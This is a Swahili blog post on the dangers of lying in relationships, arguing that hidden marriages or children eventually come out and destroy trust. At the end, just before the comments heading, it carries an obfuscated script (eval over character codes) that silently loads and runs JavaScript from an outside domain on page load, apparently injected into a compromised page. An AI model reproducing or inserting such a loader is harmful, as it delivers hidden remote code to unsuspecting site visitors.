Faida kubwa ya uongo ni kuficha hila zako bila mlengwa kukugundua, lakini hasara zake ni kubwa, mara nyingi unapogundulika kwamba umeongopa, hupoteza uaminifu na kuonekana mtu usiyefaa kwenye jamii.
Katika Ulimwengu na mapenzi ya sasa, watu wengi huishi katika uongo ili kuendesha maisha yao au kumpata mtu ambaye anaamini akimueleza ukweli anaweza kumkosa,Kweli unaweza kufanikiwa kumficha mwenzako kuwa hujaoa au hujaolewa kumbe umo ndani ya ndoa, wengine huficha hata kama wana watoto ili kufanikisha wanavyovitaka na kusahau hakuna uongo wa milele.
Wengi wanaoishi katika uongo, hua ni watu wa mashaka kwa kuhofia siri zao kuvuja, Hata kama akiwaona watu wakizungumza pembeni yake anaanza kujihisi kutetwa. Mwisho wake siku siri inabainika unajikuta ukimpoteza mpenzi wako ambaye hawezi kukuamini tena.
Sometimes unamdanganya zaidi ya miaka 10 ukiamini siri ile itaendelea milele. Napenda kuwaeleza watu kuhusu uongo katika mapenzi, mwanzo huweza kuona upo sawa lakini unasahau umezungukwa na jamii ambayo inakufahamu toka nitoke na Kwa vile hakuna siri ya watu zaidi ya mmoja ipo siku itamfikia mwenzako.
Na kwasababu ulimfanya mjinga miaka mingi, basi anakuona humfai maishani na kuamini mambo mengi unayoyafanya huwa unadanganya hata kama umefanya jambo la kweli. Kwa vile umeonekana una rekodi ya uongo, hutaaminika tena, ambapo kwa wenye moyo mdogo wakijua kuwa wewe si mkweli, lazima watauvunja uhusiano kutokana na kukosa sifa za mpenzi wa kweli, mwaminifu na muwazi.
Nikushauri tu kwamba tuache kujificha nyuma ya kivuli cha uongo ambacho ni sawa na kukata tawi ulilokalia ukianguka utakosa wa kumlaumu. Katika kutafuta mpenzi wa kweli vitu hivi vinatakiwa kuzingatiwa kiuhalisia uwazi na ukweli ndivyo vinavyolinda mapenzi ya kweli.
Ukiwa muwazi na mkweli kwa mpenzi wako inakufanya uishi kwa uhuru zaidi na unapomueleza ukweli mpenzi wako mpya kuwa una mtoto au ulioa au kuolewa na kuachwa na kumuona mtu huyo anaruka futi 100, amini huyo si mtu sahihi kwako.
Kuolewa na kuachwa au kuzaa si kigezo cha mtu kukuruka futi 100, ukiona hivyo amini mtu huyo yupo na wewe kwa ajili ya tamaa zake za mwili na si kuishi pamoja.
Ili kuepusha yote haya tukubali tu Ukweli unauma ila hakuna namna ni vyema tu kuutumia kuliko kudanganya na kutegemea uongo.
Ona Hatari ya Uongo Katika Mahusiano
<script>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));/*54745756836*/</script>
Recent Comments